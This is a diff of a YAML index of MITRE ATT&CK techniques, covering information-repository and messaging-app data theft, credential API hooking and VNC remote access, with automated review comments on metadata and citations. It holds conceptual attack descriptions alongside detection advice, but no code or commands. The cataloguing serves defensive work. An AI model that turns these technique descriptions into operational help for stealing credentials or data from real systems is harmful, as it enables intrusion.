name: Data from Information Repositories
description: "Adversaries may leverage information repositories to mine valuable
information. Information repositories are tools that allow for storage of
information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries
- in further objectives, or direct access to the target information. Adversaries
- may also abuse external sharing features to share sensitive documents with
- recipients outside of the organization. \n\nThe following is a brief list
- of example information that may hold potential value to an adversary and may
- also be found on an information repository:\n\n* Policies, procedures, and
- standards\n* Physical / logical network diagrams\n* System architecture diagrams\n*
- Technical system documentation\n* Testing / development credentials\n* Work
- / project schedules\n* Source code snippets\n* Links to network shares and
- other internal resources\n\nInformation stored in a repository may vary based
- on the specific instance or environment. Specific common information repositories
- include web-based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002)
- and [Confluence](https://attack.mitre.org/techniques/T1213/001), specific
- services such as Code Repositories, IaaS databases, enterprise databases,
- and other storage infrastructure such as SQL Server."
+ in further objectives, such as Credential Access, Lateral Movement, or Defense
+ Evasion, or direct access to the target information. Adversaries may also
+ abuse external sharing features to share sensitive documents with recipients
+ outside of the organization (i.e., [Transfer Data to Cloud Account](https://attack.mitre.org/techniques/T1537)).
+ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on an information repository:\n\n*
+ Policies, procedures, and standards\n* Physical / logical network diagrams\n*
+ System architecture diagrams\n* Technical system documentation\n* Testing
+ / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
+ \n* Work / project schedules\n* Source code snippets\n* Links to network shares
+ and other internal resources\n* Contact or other sensitive information about
+ business partners and customers, including personally identifiable information
+ (PII) \n\nInformation stored in a repository may vary based on the specific
+ instance or environment. Specific common information repositories include
+ the following:\n\n* Storage services such as IaaS databases, enterprise databases,
+ and more specialized platforms such as customer relationship management (CRM)
+ databases \n* Collaboration platforms such as SharePoint, Confluence, and
+ code repositories\n* Messaging platforms such as Slack and Microsoft Teams
+ \n\nIn some cases, information repositories have been improperly secured,
+ typically by unintentionally allowing for overly-broad access by all users
+ or even public access to unauthenticated users. This is particularly common
+ with cloud-native or cloud-hosted services, such as AWS Relational Database
+ Service (RDS), Redis, or ElasticSearch.(Citation: Mitiga)(Citation: TrendMicro
+ Exposed Redis 2020)(Citation: Cybernews Reuters Leak 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
x_mitre_contributors:
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Regina Elwell
- Praetorian
- Milos Stojadinovic
- Isif Ibrahima, Mandiant
+ - Obsidian Security
+ - Naveen Vijayaraghavan
+ - Nilesh Dherange (Gurucul)
x_mitre_deprecated: false
x_mitre_detection: "As information repositories generally have a considerably
large user base, detection of malicious use can be non-trivial. At minimum,
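Review bot: the T1213 contributor list loses four credited entries (Regina Elwell, Praetorian, Milos Stojadinovic, Isif Ibrahima, Mandiant) and splits the combined `Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` line into two while adding Obsidian Security; dropping prior contributors on a version bump is unusual, so confirm this mirrors the upstream object rather than a parsing difference. The three citations introduced in the new description (Mitiga, TrendMicro Exposed Redis 2020, Cybernews Reuters Leak 2022) are each defined in `external_references` in the following hunks, so those resolve.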
@@ -49663,10 +50271,9 @@ collection:
- Windows
- macOS
- SaaS
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '3.3'
+ - Office Suite
+ x_mitre_version: '3.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
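Review bot: replacing `Office 365` and `Google Workspace` with `Office Suite` changes which platform-filtered views this technique appears in, so anything keyed on the old platform names (per-platform index CSVs, saved queries) must be regenerated in the same change or it will silently lose T1213. Minor: `Office Suite` is appended after `IaaS` rather than next to `SaaS` where the removed entries sat, so the platform list is no longer grouped by type.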
@@ -49679,10 +50286,20 @@ collection:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1213
external_id: T1213
+ - source_name: Mitiga
+ description: Ariel Szarf, Doron Karmi, and Lionel Saposnik. (n.d.). Oops,
+ I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots.
+ Retrieved September 24, 2024.
+ url: https://www.mitiga.io/blog/how-mitiga-found-pii-in-exposed-amazon-rds-snapshots
- source_name: Atlassian Confluence Logging
description: Atlassian. (2018, January 9). How to Enable User Access Logging.
Retrieved April 4, 2018.
url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html
+ - source_name: TrendMicro Exposed Redis 2020
+ description: David Fiser and Jaromir Horejsi. (2020, April 21). Exposed Redis
+ Instances Abused for Remote Code Execution, Cryptocurrency Mining. Retrieved
+ September 25, 2024.
+ url: https://www.trendmicro.com/en_us/research/20/d/exposed-redis-instances-abused-for-remote-code-execution-cryptocurrency-mining.html
- source_name: Microsoft SharePoint Logging
description: Microsoft. (2017, July 19). Configure audit settings for a site
collection. Retrieved April 4, 2018.
@@ -49691,11 +50308,14 @@ collection:
description: Microsoft. (n.d.). Sharepoint Sharing Events. Retrieved October
8, 2021.
url: https://docs.microsoft.com/en-us/microsoft-365/compliance/use-sharing-auditing?view=o365-worldwide#sharepoint-sharing-events
+ - source_name: Cybernews Reuters Leak 2022
+ description: Vilius Petkauskas . (2022, November 3). Thomson Reuters collected
+ and leaked at least 3TB of sensitive data. Retrieved September 25, 2024.
+ url: https://cybernews.com/security/thomson-reuters-leaked-terabytes-sensitive-data/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1602.001:
technique:
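Review bot: stray space before the period in the new Cybernews reference description, `Vilius Petkauskas . (2022, November 3)`; it should read `Vilius Petkauskas. (2022, November 3)`. This string is what gets rendered as the citation text, so the typo will surface in generated output.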
@@ -49732,7 +50352,7 @@ collection:
description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation
of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October
19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T01:54:22.812Z'
name: SNMP (MIB Dump)
description: "Adversaries may target the Management Information Base (MIB) to
collect and/or mine valuable information in a network managed using Simple
@@ -49764,115 +50384,182 @@ collection:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
+ modified: '2024-08-27T21:03:56.385Z'
+ name: 'Input Capture: Credential API Hooking'
+ description: |
+ Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
+
+ * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
+ * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
+
+ Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
+
+ Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Metadata'
+ - 'Process: OS API Execution'
type: attack-pattern
+ id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
created: '2020-02-11T19:01:15.930Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1056.004
url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
- source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
Retrieved December 18, 2017.
url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Hook Overview
description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
description: Stack Exchange - Security. (2012, July 31). What are the methods
to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
- name: 'Input Capture: Credential API Hooking'
- description: |
- Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
-
- * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)
- * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
- * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ identifier: T1056.004
+ atomic_tests: []
+ T1213.005:
+ technique:
+ modified: '2024-10-16T14:22:49.146Z'
+ name: Messaging Applications
+ description: "Adversaries may leverage chat and messaging applications, such
+ as Microsoft Teams, Google Chat, and Slack, to mine valuable information.
+ \ \n\nThe following is a brief list of example information that may hold potential
+ value to an adversary and may also be found on messaging applications: \n\n*
+ Testing / development credentials (i.e., [Chat Messages](https://attack.mitre.org/techniques/T1552/008))
+ \n* Source code snippets \n* Links to network shares and other internal resources
+ \n* Proprietary data(Citation: Guardian Grand Theft Auto Leak 2022)\n* Discussions
+ about ongoing incident response efforts(Citation: SC Magazine Ragnar Locker
+ 2021)(Citation: Microsoft DEV-0537)\n\nIn addition to exfiltrating data from
+ messaging applications, adversaries may leverage data from chat messages in
+ order to improve their targeting - for example, by learning more about an
+ environment or evading ongoing incident response efforts.(Citation: Sentinel
+ Labs NullBulge 2024)(Citation: Permiso Scattered Spider 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: collection
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: |-
- Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)
-
- Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.
-
- Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - Obsidian Security
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ - Office Suite
x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- - 'Process: Process Metadata'
- - 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- identifier: T1056.004
+ - 'Application Log: Application Log Content'
+ type: attack-pattern
+ id: attack-pattern--fb75213f-cfb0-40bf-a02f-3bad93d6601e
+ created: '2024-08-30T13:50:42.023Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1213/005
+ external_id: T1213.005
+ - source_name: Sentinel Labs NullBulge 2024
+ description: " Jim Walter. (2024, July 16). NullBulge | Threat Actor Masquerades
+ as Hacktivist Group Rebelling Against AI. Retrieved August 30, 2024."
+ url: https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
+ - source_name: SC Magazine Ragnar Locker 2021
+ description: Joe Uchill. (2021, December 3). Ragnar Locker reminds breach
+ victims it can read the on-network incident response chat rooms. Retrieved
+ August 30, 2024.
+ url: https://www.scmagazine.com/analysis/ragnar-locker-reminds-breach-victims-it-can-read-the-on-network-incident-response-chat-rooms
+ - source_name: Guardian Grand Theft Auto Leak 2022
+ description: 'Keza MacDonald, Keith Stuart and Alex Hern. (2022, September
+ 19). Grand Theft Auto 6 leak: who hacked Rockstar and what was stolen?.
+ Retrieved August 30, 2024.'
+ url: https://www.theguardian.com/games/2022/sep/19/grand-theft-auto-6-leak-who-hacked-rockstar-and-what-was-stolen
+ - source_name: Microsoft DEV-0537
+ description: Microsoft. (2022, March 22). DEV-0537 criminal actor targeting
+ organizations for data exfiltration and destruction. Retrieved March 23,
+ 2022.
+ url: https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
lateral-movement:
T1021.005:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:20:07.264Z'
name: Remote Services:VNC
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely control machines using Virtual Network Computing (VNC). VNC is a platform-independent desktop sharing system that uses the RFB (“remote framebuffer”) protocol to enable users to remotely control another computer’s display by relaying the screen, mouse, and keyboard inputs over the network.(Citation: The Remote Framebuffer Protocol)
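Review bot: T1056.004 drops `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) entirely, while T1602.001 at the top of this same hunk keeps its `x_mitre_permissions_required: Administrator`; likewise T1602.001 loses `x_mitre_attack_spec_version: 2.1.0` with nothing replacing it in view, whereas T1056.004 and the new T1213.005 both gain `x_mitre_attack_spec_version: 3.2.0`. Either the upstream objects genuinely diverge or the two were regenerated from different sources; confirm which. Two smaller points: the rewritten T1056.004 block keeps `identifier: T1056.004` before `atomic_tests: []` but the new T1213.005 object has no `identifier:` key, so pick one convention; and the Sentinel Labs reference description starts with a leading space (`" Jim Walter. (2024, July 16)`), which will carry into the rendered citation.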
@@ -49883,6 +50570,7 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
+ x_mitre_deprecated: false
x_mitre_detection: |-
Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior using VNC.
@@ -49892,7 +50580,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
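Review bot: `x_mitre_modified_by_ref` is removed from the middle of the T1021.005 object here, and every other technique in this diff ends with that field (for example T1213.005 closes with `x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5`). If the generator simply moved it to the end of the object, the next hunk should show it being re-added; if it does not, the field has been lost for this technique.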
@@ -49908,66 +50595,67 @@ lateral-movement:
id: attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b
created: '2020-02-11T18:28:44.950Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1021/005
external_id: T1021.005
- - source_name: The Remote Framebuffer Protocol
- description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
- Framebuffer Protocol. Retrieved September 20, 2021.
- url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: Attacking VNC Servers PentestLab
+ description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
+ VNC Servers. Retrieved October 6, 2021.
+ url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- source_name: MacOS VNC software for Remote Desktop
description: Apple Support. (n.d.). Set up a computer running VNC software
for Remote Desktop. Retrieved August 18, 2021.
url: https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
- - source_name: VNC Authentication
- description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
- September 20, 2021.
- url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
- - source_name: Hijacking VNC
- description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
- Access and Crack). Retrieved September 20, 2021.'
- url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
+ - source_name: Havana authentication bug
+ description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
+ seeing the VNC Consoles of Tenant B!. Retrieved September 12, 2024.
+ url: https://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
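Review bot: Most of this reference-list hunk is churn rather than change: the only entry whose content differs is "Havana authentication bug" (URL moved from http to https, Retrieved date refreshed to September 12, 2024), while the other nine entries are deleted and re-added byte-for-byte in a new position (sorted by the author string at the start of each description), which hides the one real edit. If the generator sorts deterministically this is acceptable, but it deserves a line in the commit message. Nit on the re-added entry: "T. Richardson, J. Levine, RealVNC Ltd.. (2011, March)" carries a doubled period; leave it if it mirrors upstream verbatim, otherwise fix it at the source. The trailing metadata change (drop `spec_version: '2.1'`, bump `x_mitre_attack_spec_version` to 3.2.0, add `x_mitre_modified_by_ref`) is consistent with the rest of the diff.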
@@ -49992,11 +50680,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
